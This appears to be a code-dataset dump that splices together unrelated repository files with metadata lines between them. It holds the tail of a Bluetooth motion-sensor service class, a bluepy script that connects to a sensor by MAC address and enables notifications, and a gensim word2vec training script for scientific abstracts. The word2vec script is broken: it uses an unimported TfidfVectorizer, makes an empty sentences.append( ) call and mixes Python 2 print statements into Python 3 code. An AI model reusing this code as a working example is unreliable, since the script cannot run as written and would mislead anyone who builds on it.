write_uint16(current_config, motion_freq, 3) self.config_char.write(binascii.a2b_hex(new_config), True) if wake_on_motion is not None and self.config_char is not None: current_config = binascii.b2a_hex(self.config_char.read()) new_config = write_uint8(current_config, wake_on_motion, 8) self.config_char.write(binascii.a2b_hex(new_config), True) def disable(self): set_tap_notification(False) set_orient_notification(False) set_quaternion_notification(False) set_stepcount_notification(False) set_rawdata_notification(False) set_euler_notification(False) set_rotation_notification(False) set_heading_notification(False) set_gravity_notification(False)
Python
1,125
37.344891
213
/Services.py
0.537547
0.500116
Nimunex/TFG
refs/heads/master
##Main from bluepy import btle from bluepy.btle import Peripheral, DefaultDelegate import os.path import struct import binascii import sys import datetime import time from time import time,sleep import Services from Services import EnvironmentService, BatterySensor, UserInterfaceService, MotionService, DeviceDelegate import Device from Device import Device from urllib.request import urlopen ##Mac 1: FD:88:50:58:E7:45 ##Mac 2: E4:F6:C5:F7:03:39 ## MAC address Device device global MAC if __name__ == "__main__": MAC = str(sys.argv[1]) print("Connecting to " + MAC) Device1 = Device(MAC) print("Connected...") print("Bonding...") Device1.setSecurityLevel("medium") print("Bonded...") print("Enabling Services...") Device1.battery.enable() #~ Device1.ui.enable() Device1.motion.enable() Device1.setDelegate(DeviceDelegate()) print('Services Enabled...') print('Battery Level(1): ', Device1.battery.b_read(), '%') #~ Device1.ui.set_led_mode_breathe(0x02, 50, 1000) ##Battery sensor #~ Device1.battery.set_battery_notification(True) ##UI service #~ Device1.ui.set_button_notification(True) ##Motion Services Device1.motion.configure(motion_freq=5) #~ Device1.motion.set_tap_notification(True) #~ Device1.motion.set_orient_notification(True) #~ Device1.motion.set_quaternion_notification(True) #~ Device1.motion.set_stepcount_notification(True) #~ Device1.motion.set_rawdata_notification(True) Device1.motion.set_euler_notification(True) #~ Device1.motion.set_rotation_notification(True) #~ Device1.motion.set_heading_notification(True) #~ Device1.motion.set_gravity_notification(True) try: while True: if Device1.waitForNotifications(180.0) : # handleNotification() was called continue print("Waiting...") except KeyboardInterrupt: print("Disabling Notifications and Indications...") Device1.battery.disable() Device1.ui.disable() Device1.motion.disable() print("Notifications and Indications Disabled...") print("Device Session Finished...")
Python
94
23.521276
107
/mainMotion.py
0.649892
0.624295
rafunchik/shrimps
refs/heads/master
# coding=utf-8 import codecs import re from abstract import Abstract __author__ = 'rcastro' from gensim.models import Word2Vec from codecs import open import nltk #nltk.download() # Download text data sets, including stop words from nltk.corpus import stopwords # Import the stop word list import numpy as np #model = Word2Vec.load_word2vec_format("/Users/rcastro/nltk_data/word2vec_models/GoogleNews-vectors-negative300.bin", binary=True) #print(model.most_similar('Crayfish', topn=5)) print ("get the abstracts") text = '' try: with codecs.open('/Users/rcastro/dev/abstracts.txt', 'r', encoding='utf8') as abstracts_file: text = abstracts_file.read().strip() except IOError as e: print ('Operation failed: %s' % e.strerror) abstracts = [Abstract(x) for x in text.split("\r\n\r\n")] num_reviews = len(abstracts) clean_train_reviews = [x.text for x in abstracts] def remove_numeric_tokens(string): return re.sub(r'\d+[^\w|-]+', ' ', string) vectorizer = TfidfVectorizer(analyzer="word", tokenizer=None, preprocessor=remove_numeric_tokens, stop_words='english', lowercase=True, ngram_range=(1, 2), min_df=1, max_df=1, # quizas probar con 0.8 x ahi token_pattern=r"(?u)\b[\w][\w|-]+\b", max_features=155000) analyzer = vectorizer.build_analyzer() review_lists = [analyzer(w) for w in clean_train_reviews] # Download the punkt tokenizer for sentence splitting import nltk.data # Load the punkt tokenizer tokenizer = nltk.data.load('tokenizers/punkt/english.pickle') # Define a function to split a review into parsed sentences def review_to_sentences( review, tokenizer, remove_stopwords=True ): # Function to split a review into parsed sentences. Returns a # list of sentences, where each sentence is a list of words # # 1. Use the NLTK tokenizer to split the paragraph into sentences raw_sentences = tokenizer.tokenize(review.strip()) # # 2. Loop over each sentence sentences = [] for raw_sentence in raw_sentences: # If a sentence is empty, skip it if len(raw_sentence) > 0: # Otherwise, call review_to_wordlist to get a list of words sentences.append( ) # # Return the list of sentences (each sentence is a list of words, # so this returns a list of lists return sentences sentences = [] # Initialize an empty list of sentences print "Parsing sentences from training set" for review in clean_train_reviews: sentences += review_to_sentences(review, tokenizer) # Import the built-in logging module and configure it so that Word2Vec # creates nice output messages import logging logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO) # Set values for various parameters num_features = 400 # Word vector dimensionality min_word_count = 1 # Minimum word count num_workers = 4 # Number of threads to run in parallel context = 20 # Context window size downsampling = 1e-3 # Downsample setting for frequent words # Initialize and train the model (this will take some time) from gensim.models import word2vec print "Training model..." # bigram_transformer = gensim.models.Phrases(sentences) # >>> model = Word2Vec(bigram_transformer[sentences], size=100, ...) model = word2vec.Word2Vec(sentences, workers=num_workers, size=num_features, min_count = min_word_count, window = context, sample = downsampling, batch_words = 1000) # If you don't plan to train the model any further, calling # init_sims will make the model much more memory-efficient. model.init_sims(replace=True) # It can be helpful to create a meaningful model name and # save the model for later use. You can load it later using Word2Vec.load() model_name = "400features_2minwords_20context" model.save(model_name) print model.doesnt_match("man woman child kitchen".split()) print model.doesnt_match("france england germany berlin".split()) print model.most_similar("prawn", topn=10)
Python
117
35.53846
130
/word2vec.py
0.66963
0.656762